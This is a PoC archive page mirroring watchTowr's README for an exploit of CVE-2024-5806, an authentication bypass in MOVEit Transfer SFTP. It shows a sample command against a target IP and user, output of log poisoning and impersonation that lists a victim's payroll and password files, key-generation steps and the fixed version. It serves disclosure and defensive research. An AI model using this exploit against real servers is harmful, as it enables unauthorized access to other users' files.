Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-5806 PoC — Progress Software MOVEit Transfer 安全漏洞

Source
https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806
Associated Vulnerability
Title:Progress Software MOVEit Transfer 安全漏洞 (CVE-2024-5806)
Description:Progress Software MOVEit Transfer是美国Progress Software公司的一套自动化的文件传输软件。该软件支持文件传输,并提供文件传输活动监控功能。 Progress Software MOVEit Transfer存在安全漏洞,该漏洞源于存在中不正确的身份验证漏洞,在有限情况下可能导致绕过身份验证。
Description
Exploit for the CVE-2024-5806
Readme
# CVE-2024-5806

Exploit for Progress MOVEit Transfer CVE-2024-5806. See our blog post at [TBD].

# PoC in Action

See `--help` for, well, help. A typical run should look like this:

```
> python CVE-2024-5806.py --target-ip 192.168.1.1 --target-user user2 --ppk id.ppk --pem id
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-5806.py
        (*) Progress MoveIT Transfer SFTP Authentication Bypass (CVE-2024-5806)
          - Aliz Hammond, watchTowr (aliz@watchTowr.com)
          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
        Note: We (watchTowr) aren't the original discoverers of the bug, we just reproduced it and wrote the exploit
              in order to enable proactive protection of client attack surfaces.
              We will update with proper credit when available.
        CVEs: [CVE-2024-5806]

(*) Poisoning log files multiple times to be sure...
..........OK
(*) Waiting 60 seconds for logs to be flushed to disk
(*) Attempting to authenticate..
(*) Trying to impersonate user2 using the server-side file path 'C:\MOVEitTransfer\Logs\DMZ_WEB.log'
(+) Authentication succeeded.
(+) Listing files in home directory of user user2:

-rw-rw-rw- 1 0 0 1.4M Jun 11 11:39 stocks.xlsx
-rw-rw-rw- 1 0 0 2.4M Jun 13 13:32 customer_list.xlsx
-rw-rw-rw- 1 0 0 2.3M Jun 15 12:16 payroll_Jun.csv
-rw-rw-rw- 1 0 0 1.2M Jan 21 10:03 my_signature.png
-rw-rw-rw- 1 0 0  304 Jun 17 17:29 passwords.txt
```


# Setup
To run the exploit, you'll need a keypair in both PEM and PPK format. On Windows, you can use `puttygen` to generate these files. On Linux, you can use `openssh` and `putty-tools` package. Just hit enter when prompted for a key.

```bash
$ sudo apt-get install openssh-client putty-tools
$ puttygen -t rsa -b 2048 -o putty_key.ppk
Enter passphrase to save key:
Re-enter passphrase to verify:
$ puttygen putty_key.ppk -O private-openssh -o id_rsa
```

# Affected Versions

This vulnerability is fixed in Progress MOVEit version `2024.0.2`.

# Exploit authors

This exploit was written by [Aliz (@AlizTheHax0r)](https://x.com/AlizTheHax0r) and [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber) 

# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- [blog link TBD]
File Snapshot

 [4.0K]  /data/pocs/eb33b3c46132f020ff92155733d2b81339615c0e
├── [2.7K]  README.md
├── [  26]  requirements.txt
└── [5.9K]  watchTowr-vs-progress-moveit_cve-2024-5806.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.